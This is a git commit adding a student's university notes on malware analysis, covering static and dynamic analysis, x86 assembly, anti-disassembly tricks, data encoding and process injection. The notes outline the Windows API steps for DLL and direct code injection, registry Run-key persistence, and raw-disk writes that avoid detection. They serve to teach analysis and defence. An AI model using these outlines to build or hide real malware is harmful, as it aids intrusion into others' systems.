Add the rest of university notes

This commit is contained in:
John Gatward committed 2026-10-04 14:02:35 +01:00
1 parent c1b84c7f7d
commit d0f27f276b
366 files changed
+9844 -110

No files matched your search

+140
View File
@@ -0,0 +1,140 @@
# Malware Analysis Techniques
### Basic Static Analysis
- Examining the executable file without viewing the actual instructions
- This can confirm whether a file is malicious
- Provide information about its functionality
- Provide information that will allow us to produce network signatures
- Basic static analysis is straightforward and quick
- However is largely ineffective against sophisticated malware.
##### Techniques
- Using **antivirus tools** to confirm maliciousness
- virus total is an online tool to scan files for known malware
- Using **hashes** to identify malware
- When the file is run through a hashing algorithm (often `md5` or `SHA-1`) it uniquely identifies it.
- This is useful to see if other malware analysts have seen this malware
- Gleaning information from a **file’s strings**, functions and headers
- Note: microsoft uses the term wide character to describe its implementation of Uni-code strings.
- Strings can return
- IP addresses to where the malware is sending/receiving
- Windows system calls like `GetLayout` & `SetLayout` which are used in windows graphics library
- Windows libraries such as `GDI32.DLL` which is a graphics library.
- Therefore we can infer this malware opens a GUI display
- Note: strings will show the executable’s manifest at the end, a brief `xml` file.
### Basic Dynamic Analysis
- Running the malware and observing its behaviour on the system in order to:
- remove the infection
- produce effective signatures
- Is important to note that a safe environment should be set up, so that the malware can be run without risk of damage to your system or network
- Like basic static analysis, this can be useful but can miss important functionality
### Advanced Static Analysis
- Reverse-engineering the malware’s internals by loading the executable into a disassembler
- This involves looking at the instructions to discover what the malware does
- This requires an in-depth knowledge of disassembly, code constructs and windows operating system constructs
#### Problems with Static Analysis
- Only shows us what is in the program
- Not how it is used (if it used at all)
- Might see potential filename - but is that file created or deleted
- Does it get used every time the program is run or under certain circumstances
- Unsure of sequence of events
- Just because we can’t see something, doesn’t mean the program doesn’t do it
### Advanced Dynamic Analysis
- Running the malware in a debugger to examine the internal state.
- Allows you to see internal states of variables and how the program uses memory over time.
### Packed and Obfuscated Malware
Malware writers often use packing or obfuscation to make malware files more difficult to detect or analyse.
**Obfuscated** programs are ones whose execution the malware author has attempted to hide
- This can be done by changing variable names, minifying code
**Packed** programs are a subset of obfuscated programs, in which the malware is compressed and cannot be analysed.
- This stops us from being able to read strings from the program
- If running strings on a program yields little information, the program is probably packed and therefore malicious.
> Packed and obfuscated code will often include at least the functions `LoadLibrary` and `GetProcAddress`, which are used to load and gain access to additional functions.
#### Packing Files
When the packed program is run, a small wrapper program also runs to decompress the packed file and then run the unpacked file.
- When a packed program is analysed statically, only the small wrapper program can be dissected
![1645731141.png](img/1645731141.png)
- Programs like `PEiD` can be used to ascertain whether the file has been packed or not
### Linked Libraries and Functions
One of the most useful pieces of information we can gather about a program is the list of functions that it imports.
- Code libraries can be connected to the main executable by *linking*
- Code libraries can be linked statically, at runtime or dynamically
##### Static Linking
When a library is statically linked, all code from that library is copied into the executable which makes the executable grow in size.
- It is difficult to differentiate between the programs code and the imported code as nothing in the PE header suggests the file contains linked code
- This is the most uncommon method of linking
##### Run-time Linking
- Run-time linking is commonly used by malware, especially when packed or obfuscated
- Executable files connect to libraries only when that function is needed, **not at program start**
- `GetProcAddress` and `LoadLibrary` allow the program to access any function in any library on the system.
- This means when functions are used, we cannot tell statically which functions are linked.
##### Dynamic Linking
When libraries are dynamically linked, the host OS searches for necessary libraries when the program is loaded.
- The PE file header stores information about every library that will be loaded and every function that will be used by the program
#### Commonly linked DLLs
- `Kernel32.dll`
- Very common library contains core functionality such as access & manipulation of memory, files and hardware.
- `User32.dll`
- This `DLL` contains all the user-interface components such as buttons, scrolling etc
#### Common imported functions
The PE file header also includes information about specific functions used by an executable. The names alone will give clues however microsoft documents everything on MSDN
- `FindFirstFileW`, `FindNextFileW`, `FindClose`
- These all involve searching the users system for files
- `FindFirstFileW` will include a string for regex, so we can see if its searching for all files `./*` or a specific `myFile.exe`
- `ReadFile`, `WriteFile`
- `SetWindowsHookExW`
- Often used to implement keylogs
- `CreateWindowExW`, `DefWindowProcW`, `getWindowsTextW`, `setWindowsTextW` etc
- This relates to setting up a GUI
- `RegisterHotkey`
- Find what this keypress is, to see what it does
#### PE Header Summary
| Field | Information Revealed |
| --------------- | ------------------------------------------------------------ |
| Imports | Functions from other libraries that are used by the malware |
| Exports | Functions in the malware that are meant to be called by other programs or libraries |
| Time Date Stamp | Time when the program was compiled |
| Sections | Names of sections in the file and their sizes on disk and in memory |
| Subsystem | Indicates whether the program is a command-line or GUI application |
| Resources | Strings, icons, menus |
@@ -0,0 +1,64 @@
# Dynamic Analysis
Programs = data structures + algorithms
- All programs (including malware) are a series of instructions
- That get executed by the CPU
- By observing these instructions as they run, we can see what the program actually does
##### Internal Actions
- Some of the instructions will cause things to happen within the program
- Only affecting the data within the program
- We can analyse this but it requires us to get inside the program and watch what it does internally
- Using tools like a *debugger*
- Requires understanding of machine code
##### External Actions
- Programs also have effects outside the program
- Can monitor the external actions and get an idea about the programs activity
- Not just what the program does but also the order the program performs those actions
##### Running the Malware
Note:
- It is important that dynamic analysis is done after the program has been statically analysed
- This is because the malware can put your system and network at risk
- Can be tricky to make the malware run
- If its distributed as a `.exe`, then we can just run it
- But might do different things based on command line options
- If its distributed as `.DLL`, then its more complicated
- Can use `rundll32.exe` to start it and specify the export to call
- As a last resort you can force the `.dll` to behave as a `.exe` by editing the PE header
#### Monitoring with Process Monitor - ProcMon
Process Monitor or procmon is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, process and thread activity.
- Procmon monitors all system calls
- Because there are so many system calls (around 50,000 per minute) it is import to filter by type
- Filter by:
- **Registry** - Tells us how malware installs itself into the registry
- **File System** - Shows us all the files that the malware creates or config files it uses
- **Process Activity** - Tells us if the malware spawns any additional processes
- **Network** - Shows us if the malware is listening on any specific ports
#### Comparing Registry Snapshots - RegShot
An open-source registry comparison tool that allows you to take and compare two registry snapshots.
- We can look for added values
- A malware has added a new registry key
- Or modified keys
- A malware has modified a registry perhaps inserting itself into non-malicious software
### General Steps
1. Run procmon
2. Run process explorer
3. Get an initial snapshot with RegShot
4. Run the malware
5. Take another snapshot and compare, also analysing procmon and process explorer.
+200
View File
@@ -0,0 +1,200 @@
# Crash Course in x86 Assembler
- Malware authors creates programs at the high-level language and use a compiler to generate machine code to by run by the CPU
- Malware analysts operate at the low-level language. Using disassembler to generate assembly code from the machine code to try and understand how the malware works
![1646418960.png](img/1646418960.png)
### x86 Architecture
x86 architecture follows the Von Neuman architecture and has three hardware components
- CPU executes code
- Main memory (RAM) stores all data and code instructions
- An input/output system (I/O) interfaces with devices such as hard drives, keyboards and monitors
![1646419266.png](img/1646419266.png)
#### Main Memory
The main memory for a single program can be divided into the following four major sections.
![1646419322.png](img/1646419322.png)
**Data** - Contains values that are put in place when a program is initially loaded
**Code** - Includes the instructions fetched by the CPU to execute the programs tasks. The code controls what the program does
**Heap** - The heap is used for dynamic memory during program execution, to create (or allocate) new values and eliminate (free) values that the program no longer needs. The heap’s size changes frequently while the program runs
**Stack** - The stack is used for local variables and parameters for functions, and to help control program flow
##### Instructions
Each instruction is comprised of an **opcode** and zero or more **operands**.
**opcode** - instruction
**operand** - argument or data
**endianess**
- Whether the most significant bit is at the start or the end of a binary stream.
- **Big-endian** is where the most significant bit is first
- **Little-endian** is where the least significant bit is first
Disassemblers translate opcodes into human-readable instructions e.g.
```
B9 42 00 00 00
mov ecx, 0x42
```
###### Operands
Three types of operands are used in x86
1. *Immediate* operands are fixed values
2. *Register* operands refer to registers
3. *Memory address* operands refer to a memory address that contains the value of interest, typically denoted by `[reg]`
###### Registers
A register is a small amount of data storage available to the CPU, that’s really quick. There are four categories:
1. *General registers* are used by the CPU during execution
2. *Segment registers* are used to track sections of memory
3. *Status flags* are used to make decisions
4. *Instruction pointers* are used to keep track of the next instruction to execute
![1646419963.png](img/1646419963.png)
All general registers are 32-bits but can be referenced as either 32 or 16 bits in assembly code (for backwards compatibility reasons)
`EDX` - full 32-bits
`DX` - lower 16 bits
Registers `EAX`, `EBX`, `ECX`, `EDX` can be referenced as 8 bit registers
![1646420117.png](img/1646420117.png)
Some x86 instructions use specific registers by definition.
- Multiplication and division instructions always use `EAX` and `EDX`
- `EAX` generally contains the return value for function calls
- However these are just conventions and can change
###### Flags
The `EFLAGS` register is a status register 32-bits big, this means it can store 32 flags. During execution, each flag is either set to 1 if true
- **ZF** - The zero flag is set if the result of the operation was equal to zero
- **CF** - The carry flag is set when the result of an operation is too large or too small for the destination operand.
###### EIP - Instruction Pointer
`EIP` contains the memory location of the next instruction to be executed
![1646420400.png](img/1646420400.png)
##### NOP
`nop` - no operation - does nothing
When issued, execution simply preceeds to the next instruction
#### The Stack
Memory for functions, local variables and flow control is stored in the stack (LIFO)
`ESP` - Stack pointer, points to the memory address at the top of the stack
`EBP` - Stack base pointer, stays consistent within a function. The program can use it as a placeholder to keep track of the location of local variables
##### Function Calls
Main code calls and temporarily transfers execution to functions before returning to the main code.
Many functions contain a **prologue** and an **epilogue**
- The **prologue** is a few lines of code at the start of the function which prepares the stack and registers for use within the function
- The **epilogue** is at the end of the function and restores the stack and registers to their state before the function was called
When a function is called:
1. Arguments are placed on the stack using `push` instructions
2. A function called using `memory_location` which changes `EIP` to the address of the first instruction in the function and returns `EIP` to main code once the function is finished
3. The function prologue pushes local variables, parameters and `EBP` onto the stack
4. The function executes
5. The function epilogue restores the stack, `ESP` is adjusted to free local variables, and `EBP` is restored so that the calling function can address its variables.
- The `leave` instruction sets `ESP` equal to `EBP` and pops `EBP` off the stack
6. The function returns by calling `ret`, this pops the return address off the stack into `EIP`
7. The stack is adjusted to remove sent arguments
![1646421092.png](img/1646421092.png)
![1646421107.png](img/1646421107.png)
###### Passing Arguments
`c` functions and windows `api` calls, functions are called differently.
There are two things to think about
1. Who’s responsible for cleaning up the stack after the function has run, the caller or the callee
2. Which order do you put the arguments on the stack
The three most common calling conventions are `cdecl`, `stdcall` and `fastcall`.
Example pseudo code
```
int test(int x, int y, int z);
int a, b, c, ret;
ret = test (a, b, c);
```
###### cdecl
- In `cdecl` parameters are pushed onto the stack from right to left
- The caller cleans up the stack when the function is complete
- Return value stored in `EAX`
- ```assembly
push c
push b
push a
call test
add esp, 12
mov ret, eax
```
- Note line 5 is the caller cleaning up the stack
- Function names have an underscore prefix to denote `cdecl` used.
###### stdcall
- `stdcall` is similar to `cdecl` however the callee is required to clean the stack
- Therefore line 5 in the previous example would not be needed in `stdcall`
- `stdcall` is used for Windows API functions
- Functions have underscore prefix, name followed by `@` and length of arguments
###### fastcall
- In `fastcall` the first few arguments (typically first two) are passed in registers `EDX` and `ECX`
- Additional arguments are loaded right to left
- Calling function is responsible for cleaning the stack
- This is quicker as less data needs to be pushed to and retrived from the stack
- # Functions have underscore prefix, name followed by `@` and length of arguments
When debugging windows functions, you can look at `EBP` to retrace the route the program took through the code
#### Conditionals
![1646421441.png](img/1646421441.png)
+232
View File
@@ -0,0 +1,232 @@
# Disassembler
> Sucessful reverse engineers do not evaluate each instruction individually unless they must. The process is too tedious.
### Global vs Local Variables
*Globbal variables* can be accessed and used by any function in the program.
*Local variables* can be accessed only by the function in which they are defined.
Both types of variables are declared similarly in `c` but completely differently in assembly.
> **Global** variables are referenced by **memory addresses**
>
> **Local** variables are referenced by **stack addresses**
### Recognising if Statements
In IDA, branches will be represented as such:
```c
int x = 1;
int y = 2;
if (x == y){
printf("x equals y\n");
} else {
printf("x does not equals y\n");
}
```
```assembly
00401006 mov [ebp+var_8], 1
0040100D mov [ebp+var_4], 2
00401014 mov eax, [ebp+var_8]
00401017 cmp eax, [ebp+var_4]
0040101A jnz short loc_40102B
0040101C push offset aXEqualsY_ ; "x equals y.\n"
00401021 call printf
00401026 add esp, 4
00401029 jmp short loc_401038
0040102B loc_40102B:
0040102B push offset aXIsNotEqualToY ; "x is not equal to y.\n"
00401030 call printf
```
Here the instruction `jnz` on line 5 causes the branch. A `cmp` is done between `ebp+var_8` (y) and `ebp+var_4`(x). If the values are not equal, then we jump to “x is not equal to y”
This is what that looks like in IDA
![1646766562.png](img/1646766562.png)
### Recognising Loops
##### Finding for loops
For loops have 4 basic components:
1. initialisation
2. comparison
3. execution instructions
4. increment/decrement
```c
int i;
for (i=0; i<100; i++)
{
printf("i equals %d\n", i);
}
```
```assembly
mov [ebp+var_4], 0 ; INITIALISATION
jmp short loc_401016
loc_40100D:
mov eax, [ebp+var_4] ; INCREMENT START
add eax, 1
mov [ebp+var_4], eax ; INCREMENT STOP
loc_401016:
cmp [ebp+var_4], 64h ; COMPARISON
jge short loc_40102F ; COMPARISON
mov ecx, [ebp+var_4]
push ecx
push offset aID ; "i equals %d\n"
call printf
add esp, 8
jmp short loc_40100D ; UNCONDITIONAL JUMP
```
![1646766968.png](img/1646766968.png)
Note: the box on the bottom right is the function’s epilogue
##### Finding While Loops
While loops look similar to for loops in assembly, but are easier to understand.
```c
int status = 0;
int result = 0;
while (status == 0)
{
result = performAction();
status = checkResult(result);
}
```
The assembly for this code will look similar from before however it lacks the *increment* section.
```assembly
mov [ebp+var_4], 0
mov [ebp+var_8], 0
loc_401044:
cmp [ebp+var_4], 0
jnz short loc_401063 ; CONDITIONAL JUMP
call performAction
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
push eax
call checkResult
add esp, 4
mov [ebp+var_4], eax
jmp short loc_401044 ; UNCONDITIONAL JUMP
```
A conditional jump occurs on line 5 and an unconditional jump at line 13, but the only way for this code to stop executing repeatedly is for that conditional jump to occur.
#### Understanding Function Call Conventions
Function call conventions govern:
- The order in which parameters are placed on the stack or in registers
- Whether the caller or callee is responsible for cleaning up the stack
Calling convention depends on the compiler used
```c
int adder(int a, int b)
{
return a+b;
}
void main()
{
int x=1;
int y=2;
printf("adder(1,2): %d", adder(x,y));
}
```
![1646767431.png](img/1646767431.png)
### Switch Statements
Switch statements are compiled in two different ways: if style or using jump tables
```c
switch(i)
{
case 1:
printf("i = %d", i+1);
break;
case 2:
printf("i = %d", i+2);
break;
case 3:
printf("i = %d", i+3);
break;
default:
break;
}
```
##### If Style
![1646767721.png](img/1646767721.png)
##### Jump Table
This example is usually found with large contiguous `switch` statements. The compiler optimises the code to avoid needing to make so many comparisons
![1646767841.png](img/1646767841.png)
This assembly uses a jump table which defines offsets to additional memory locations. The switch variable (stored in `ecx`) is used as an index into the jump table.
`edx` is multiplied by 4 and added to the base of the jump table to determine which case code block to jump to.
It is multiplied by 4 because each entry in the jump table is an address that is 4 bytes in size.
### Disassembling Arrays
```c
int b[5] = {123, 87, 487, 7, 978};
void main()
{
int i;
int a[5];
for(i = 0; i<5; i++)
{
a[i] = i;
b[i] = i;
}
}
```
In assembly, arrays are accessed using a base address as a starting point. The size of each element is not always obvious, but can be determined by seeing how the array is being indexed.
```assembly
00401006 mov [ebp+var_18], 0
0040100D jmp short loc_401018
0040100F loc_40100F:
0040100F mov eax, [ebp+var_18]
00401012 add eax, 1
00401015 mov [ebp+var_18], eax
00401018 loc_401018:
00401018 cmp [ebp+var_18], 5
0040101C jge short loc_401037
0040101E mov ecx, [ebp+var_18]
00401021 mov edx, [ebp+var_18]
00401024 mov [ebp+ecx*4+var_14], edx ; LOCAL
00401028 mov eax, [ebp+var_18]
0040102B mov ecx, [ebp+var_18]
0040102E mov dword_40A000[ecx*4], eax ; GLOBAL
00401035 jmp short loc_40100F
```
In both cases `ecx` is used as the index, which is multiplied by 4 to account for the size of the elements. This is added onto the base address of the array to access the proper array element.
@@ -0,0 +1,163 @@
# Analysing Malicious Windows Programs
## The Windows API
##### Types and Hungarian Notation
`DWORD` - 32 bit unsigned integer
`WORD` - 16 bit unsigned integer
Hungarian notation is where variables are prefixed with their data type e.g. `dwSize` has prefix `dw` for `DWORD` indicating it is a 32 bit unsigned int
| Type and Prefix | Description |
| ------------------- | ------------------------------------------------------------ |
| `WORD` (`w`) | A 16 bit unsigned vvalue |
| `DWORD` (`dw`) | A double word, 32-bit unsigned value |
| Handles (`H`) | A reference to an object. The information stored in the handle is no documented, and the handle should be manipulated only by the Windows API |
| Long Pointer (`LP`) | A pointer to another type e.g. `LPByte` is a pointer to a byte. Strings are usually prefixed with `LP` because they are actually pointers. |
| Callback | Represents a function that will be called by the Windows API |
##### Handles
*Handles* are items that have been opened or created in the OS, such as a window, process, module, menu, file etc.
- Handles are like pointers in that they refer to an object or memory location
- Unlike pointers handles cannot be used in arithmetic operations
- The only use case is storing it and use it later in a function call
##### File System Functions
Most malware will interact with the system by creating or modifying files. Microsoft provides several functions for accessing the file system:
- `CreateFile` - used to create and open files. It can open existing files, pipes, streams and I/O devices.
- `ReadFile` and `WriteFile` - used for reading and writing to the contents of files. Both operate on files as a stream.
- `CreateFileMapping` and `MapViewOfFile` - *File mappings* are commonly used by malware writers because they allow a file to be loaded into memory and manipulated easily.
- `CreateFileMapping` loads a file from disk into memory
- `MapViewOfFile` returns a pointer to the base address of the mapping, this can be used to access the file in memory
##### Special Files
Windows has a number of file types that can be accessed much like regular files, but that are not accessed by their drive letter and folder (like `C:\docs`)
###### Shared Files
Sharted files are special files with names that start with `\\serverName\share` or `\\?\serverName\share`
- They access directories or files in a shared folder stored on a network.
- `\\?\` prefix tells the OS to disable all string parsing and allows access to longer filenames
###### Files Accessible via Namespaces
*Namespaces* can be thought of as a fixed number of folders, each storing different types of objects
- The lowest level namespace is `NT` with the prefix `\.`
- The `NT` namespace has access to all devices, and all other namespaces exist within the `NT` namespace
The `Win32` device namespace (prefix `\\.\`) is often used to access physical devices directly and read/write to them like a file.
- `\\.\PhysicalDisk1` to directly access the disk while ignoring its file system
- By doing this malware can read and write data to an unallocated sector in the drive without creating a file
- This is very good for avoiding detection
###### Alternate Data Streams
ADS allows additional data to be addwed to an existing file within `NTFS`
- The extra data doesn’t show up in a directory listing nor when displaying the contents of the file
- It’s only visible when accessing the stream
- ADS data is named `normalFile.txt:Stream:$DATA`
## The Windows Registry
The *Windows registry* is used to store OS and program configuration information, such as settings and options.
In early versions of windows the registry was just a hierarchy of `.ini` files to improve performance.
Malware often uses the registry for *persistence* or configuration data. The malware adds entries into the registry that will allow it to run automatically when the computer boots.
- **Root key** - The registry is divided into five top-level sections called *root keys* (sometimes called `HKEY`)
- **Subkey** - Akin to a subfolder within a folder
- **Key** - A key is a folder in the registry that can contain additional folders or values
- The root key and subkey are both keys
- **Value entry** - A *value entry* is an ordered pair with a name and value
- **Value or data** - The data stored in a registry entry
#### Registry Root Keys
- `HKEY_LOCAL_MACHINE` (`HKLM`) - Stores settings that are global to the local machine
- Contains ` HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- This is the key that stores a list of executables that are run at start up
- `HKEY_CURRENT_USER` (`HKCU`) - Stores settings specific to the current user
- This is a virtual key, stored in `HKEY_USERS\SID`
- Where `SID` is the security identifier of the user currently logged in
- `HKEY_CLASSES ROOT` - Stores information defining types
- `HKEY_CURRENT_CONFIG` - Stores settings about the current hardware configuration, specifically differences between the current and standard configuration
- `HKEY_USERS` - Defines settings for the default user, new user and current user
##### Common Registry Functions
- `RegOpenKeyEx` - Opens a registry for editing and querying
- `RegSetValueEx` - Adds a new value to the registry and sets its data
- `RegGetValue` - Returns the data for a value entry in the registry
You can use RegEdit to view and edit the registry.
### Networking APIs
![1646936140.png](img/1646936140.png)
## Following Malware Execution
#### DLLs
To store malicious code:
- Malware often uses a `dll` to load itself into another process
- This is because one process can only contain one `.exe`
By using Windows `dll`s:
- Windows dlls contain the functionality to interact with the OS
- By looking at what dlls are used can help find the functionality of the malware
By using third-party `dll`s
- This can provide further insight to what the malware does
- e.g. if it uses a mozilla `dll` instead of the standard windows api, it might be usiing functions not found in the windows api such as encryption
`DLL`s are similar to `EXE`s, there’s a flag in the PE to indicate the file is a dll.
#### Processes
- Malware can execute outside the current program by creating a new process or modifying an existing one.
- A process is a program being executed by Windows
- Each process manages its own resources such as open handles and memory
- A process contains one or more threads that are executed by the CPU.
- `CreateProcess` can be used to create a new process
#### Threads
Processes are the container for execution, but *threads* are what the windows OS executes.
- Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads
- A process contains one or more threads, which execute part of the code within a process.
- Threads within a process all share a memory space but have seperate registers and stack
`CreateThread` can be used to create new threads
1. Malware can use `CreateThread` to load a new malicious library into a process with `CreateThread` called and the address of `LoadLibrary` as the start address
2. Malware can create two new threads: one to listen on a socket or port and then output that to standard input of a process, and the other to read from standard output and send that to a socket.
#### Services
Another way for malware to execute additional code is by installing it as a *service*.
- Windows allows tasks to run without their own processes or threads by using services that run as background applications
- Code is scheduled and run by the Windows service manager without user input.
- Services are normally run as `SYSTEM` or another privileged account
- Key service functions:
- `OpenSCManager` Returns a handle to the service control manager
- `CreateService` - Adds a new service to the service control manager
- Allows caller to specify whether the service will start automatically at boot time, or started manually
- `StartService` Starts the service, only used if service needs to be started manually
@@ -0,0 +1,156 @@
# Anti-Disassembly
Sequences of executable code can have multiple disassembly representations, some may be invalid and some may obscure the real functionality of the program.
> Anti-disassembly techniques work by taking advantage of the assumptions and limitations of disassemblers.
>
> For example, disassemblers can only represent each byte of a program as part of one instruction at a time. If the disassembler is tricked into disassembling at the wrong offset, a valid instruction could be hidden from view.
### Linear Disassembly
Linear disassembly strategy iterates over a block of code, disassembling one instruction at a time linearly, without deviating.
- It uses the size of the disassembled instruction to determine which byte to disassemble next, with no regard for flow control instructions.
### Flow-Oriented Disassembly
This method is used by IDA
- The key difference between linear and flow-oriented is that the disassembler doesn’t blindly irate over a buffer, assuming the data is noting but instructions packed neatly together
- Instead it examines each instruction and builds a list of locations to disassemble
- Most flow-oriented disassemblers will process the false branch of a conditional jump
- Pressing the `C` key turns the cursor location into code
- Pressing the `D` key turns the cursor location into data
### Anti-Disassembler Techniques
#### Jump Instructions with the same Target
The most common anti-disassembly technique seen in the wild is two back-to-back conditional jump instructions that both *point to the same target*.
- For example the instruction `jz loc_512` followed by `jnz loc_512` will always be executed
- However if the disassembler favours the false branch it could disassemble code that will never be reached
#### Jump Instruction with a Constant Condition
Another anti-disassembly technique commonly found in the wild is composed of a single conditional jump instruction placed where the condition will always be the same.
#### Impossible Disassembly
Under some conditions, no traditional assembly listing will accurately represent the instructions that are executed. We use the term *impossible disassembly* for such conditions, but the term isn’t strictly accurate. You could disassemble these techniques, but you would need a vastly different representation of code than what is currently provided by disassemblers.
- A *rogue byte* is a byte placed after a conditional jump instruction
- This means the real instruction that follows will not be disassembled
![1647963505.png](img/1647963505.png)
1. The first instruction moves data `0xEB05` into the `AX` register
2. The second instruction zeros out this register and sets the zero flag
3. The third is a conditional jump - but is actually an unconditional jump as the zero flag will always be set
4. The disassembler will continue disassembling the fake `CALL` instruction that will never be reached
```assembly
66 B8 EB 05 mov ax, 5EBh
31 C0 xor eax, eax
74 F9 jz short near ptr sub_4011C0+1
loc_4011C8:
E8 58 C3 90 90 call near ptr 98A8D525h
```
What it could look like in IDA, note the `+1`.
- However after converting it to data and back to code, so that the only instructions visible are the `xor` instruction and the hidden instructions
```assembly
66 byte_4011C0 db 66h
B8 db 0B8h
EB db 0EBh
05 db 5
; -------------------------------------------------------
31 C0 xor eax, eax
; -------------------------------------------------------
74 db 74h
F9 db 0F9h
E8 db 0E8h
; -------------------------------------------------------
58 pop eax
C3 retn
```
- This only shows the instructions that are relevent to understanding the program
- However this solution may interfere with flow graphs.
- Since its difficult to tell how the `xor`, `pop` and `retn` instructions are used
### Obscuring Flow Control
#### The Function Pointer Problem
If function pointers are used in handwritten assembly or crafted in a **nonstandard way** in source code, the results can be difficult to reverseengineer without dynamic analysis.
```assembly
004011D0 sub_4011D0 proc near ; CODE XREF: _main+19p
004011D0 ; sub_401040+8Bp
004011D0
004011D0 var_4 = dword ptr -4
004011D0 arg_0 = dword ptr 8
004011D0
004011D0 push ebp
004011D1 mov ebp, esp
004011D3 push ecx
004011D4 push esi
004011D5 mov [ebp+var_4], offset sub_4011C0 ;1
004011DC push 2Ah
004011DE call [ebp+var_4] ;2
004011E1 add esp, 4
004011E4 mov esi, eax
004011E6 mov eax, [ebp+arg_0]
004011E9 push eax
004011EA call [ebp+var_4] ;3
004011ED add esp, 4
004011F0 lea eax, [esi+eax+1]
004011F4 pop esi
004011F5 mov esp, ebp
004011F7 pop ebp
004011F8 retn
004011F8 sub_4011D0 endp
```
Here `sub_4011C0` is called three times but IDA only recognised it once at `1`.
###### Adding Missing Code Cross-References in IDA
We can manually add these in using `AddCodeXref`
#### Return Pointer Abuse
- `Call` is a combination of `jmp` and `push`
- As it jumps to the new function and pushes a return address onto the stack
- `retn` instruction pops the value from the top of the stack and jumps to it.
- Typically used to return a function call
- However no reason why malware authors can’t use it to obscure code
```assembly
004011C0 sub_4011C0 proc near ; CODE XREF: _main+19p
004011C0 ; sub_401040+8Bp
004011C0
004011C0 var_4 = byte ptr -4
004011C0
004011C0 call $+5
004011C5 add [esp+4+var_4], 5
004011C9 retn
004011C9 sub_4011C0 endp ; sp-analysis failed
004011CA ; ----------------------------------------------
004011CA push ebp
004011CB mov ebp, esp
004011CD mov eax, [ebp+8]
004011D0 imul eax, 2Ah
004011D3 mov esp, ebp
004011D5 pop ebp
004011D6 retn
```
- Here `var_4` is set to the constant `-4`
- This means `add [esp+4+var_4], 5` is actually `add [esp+4+(-4)]`
- `0x4011C9 + 0x5 = 0x4011CA`
- The `retn` instruction jumps to that memory location
+105
View File
@@ -0,0 +1,105 @@
# Data Encoding
Malware uses encoding for a variety of reasons, the main one is for encrypting network-based communication.
- Malware needs to hide its intent
- This applies to both its operation but also to the data it uses
- Data encoding refers to all forms of content modification used for the purpose of hiding intent
- Malware will use data encoding to:
- Hide configuration information
- Save information to a staging file before stealing it
- To store strings used by the malware
- Imagine a key logger, logs what the user is searching for. The file would come up
- Disguise itself as a legitimate tool
When analysing the goal is to first find the encryption functions and then using that to decode whatever information is encoded.
#### Mechanisms for data encoding
- Malware could (and does) use standard cryptographic algorithms for data encoding
- These algorithms have high entropy
- This can be seen in IDA
- Ransomware will use standard encryption as they want the data to not be decrypted
- But malware is just as likely to use simple techniques
- Are small enough to be used in space-constrained environments
- Less obvious than more complex ciphers
- Low overhead, little impact on performance
- Not expecting immunity from being cracked, rather simply looking for an easy way to prevent basic analysis.
#### XOR Cipher
- Common mechanism used by malware authors
- Convenient to use
- Simple to implement (one instruction)
- Reversible - same function can encode and decode
##### Brute Forcing xor encoding
- Very easy to brute force crack simple xor encoding
- Only one of 256 possible values used to encode data
- Simply take a portion of the encoded text and attempt to decode it using each possible byte
- Look at each result to see if anything interesting pops out
- Can also be pre-computed if you know a string might be present
- e.g. `This program cannot be run in DOS mode`
- $k \oplus 0=k$, in the pre-ample there’s a lot of 0s, which means the key will be visible
#### Null-Preserving Single Byte XOR Encoding
- Use NULL-preserving single byte encoding scheme
- Rather than xor every byte, this has two rules
1. If byte is zero, or the key value then the byte is skipped
2. Else, xor
- Still reversible
```c
while(c = fgetc(fi), c!=EOF)
{
if (c!=0 && c!=key)
{
c ^= key;
}
fputc(c, fo);
}
```
- Relatively straight-forward to find this code in a disassembler
- Search for `xor` instructions
- There will be several (xor is used to set registers to zero)
- Look out for instructions that:
- XOR constant with a register
- XOR a register with another different register
- Look out for small loops containing `XOR`s
Other encodings
- Using addition and subtraction
- Using bit rotation
- ROT-n (the original ceaser cipher)
- Multibyte (using a longer key)
- Chained or loopback
- Encoding the data with itself
- Base64 encoded
### Base64
Base64 encoding is used to represent binary data in an ASCII string format and is commonly found in malware. The values used are `A-Z a-z 0-9 +/`.
#### Encoding with Base64
- It used 24-bit (3-byte) chunks
- The first character is placed in the most significant position
- The second in the middle 8 bits
- The third in the least significant 8 bits
- Bits are read in blocks of 6 - the number represented is used as an index to the base64 string.
![1653066344.png](img/1653066344.png)
#### Identifying and Decoding Base64
The best way to find this type of encoding is looking for the encoding string.
`ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/`
This will always be stored as a string as it needs to be indexable.
Custom encodings can be performed easily by modifying the encoding string - for example putting the lower case first, dispersing numbers within the letters etc.
+119
View File
@@ -0,0 +1,119 @@
# Processes
- Malware will often exploit other processes on the system
- Either already running, or by running them
- It does this to hide it’s activity
### Process Injection
- With process injection, malware injects its own code into a running process
- Malware execution then is not (easily) visible from outside
- Malware also gains privileges of the process it is injected into
- Common example is `DLL` injection
#### DLL Injection
- Code for the malware is contained within a `.dll` file
- Malware arranges for this `.dll` file to be loaded into the target process
- Causes malware code to be executed
##### Steps for DLL Injection
- Call `OpenProcess()` to get a `HANDLE` for the process
- Use `VirtualAllocEx()` to allocate memory inside the process
- Use `WriteProcessMemory()` to copy path to `DLL` into the process
- Use `CreateRemoteThread()` to create a new thread in the process
- Start `LoadLibrary()` as the thread routine
- Pass the address of the `DLL` path as data to the thread
#### Direct Injection
- Related technique
- Inject code directly rather than path to `DLL`
- Use `VirtualAllocEx()` to allocate memory
- Need to ensure its marked as executable
- `WriteProcessMemory()` used to copy over code
- `CreateRemoteThread()` used to start code
- Harder to write code for direct injection
- Code isn’t loaded, so will need to find address of API functions itself
#### Non-traditional Loading
- Malware code isn’t alywas loaded in traditional fashion
- Could be delivered by making use of an exploit, or process injection
- Would be delivered as a small chunk of raw machine code
- Not loaded in the traditional sense
- No relocation, no dynamic linking
- Just a raw blob of code that starts executing
- Even the address is essentially random
- This is known as **shell-code**
- Code knows where the stack is (using `ESP`)
- Can use this to create structures or store strings, by pushing the relevant values and capturing the address
- This code has a problem
- To do anything, the program is going to need to make Windows API calls
- Windows APU calls are normally made by making indirect calls to relevant implementation in the `DLL`
- Normally Windows links the calls to the `DLL`s at load time but the malware code wasn’t ‘loaded’
- The malware code does not know where the `DLL`s have been loaded into memory
##### Finding API Routines
- Possible to load and call `DLL` programmatically using `LoadLibrary`/`GetProcAddress`
- But even this requires us to know where those API functions are loaded
